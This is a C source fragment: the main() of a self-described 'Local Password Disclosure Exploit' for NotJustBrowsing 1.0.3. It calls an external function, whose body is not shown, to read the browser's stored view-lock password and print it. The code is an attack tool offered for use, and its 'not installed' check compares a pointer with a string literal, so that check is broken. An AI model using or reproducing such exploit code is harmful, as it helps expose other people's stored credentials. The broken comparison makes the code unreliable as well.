
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* bilgi_oku (int,int) ;
 int printf (char*,...) ;

int main()
{
 printf("NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan\n");
 printf("Credits to ATmaCA\n");
 printf("www.netmagister.com - www.spyinstructors.com\n");
 printf("kozan@netmagister.com\n\n");
 if(bilgi_oku(4,3)==((void*)0))
 {
  printf("An error occured!\n");
  return -1;
 }
 if(bilgi_oku(4,3)=="NOTINSTALLED")
 {
  printf("NotJustBrowsing 1.0.3 is not installed on your system!\n");
  return -1;
 }
 printf("View Lock Password: %s",bilgi_oku(4,3));
 return 0;
}
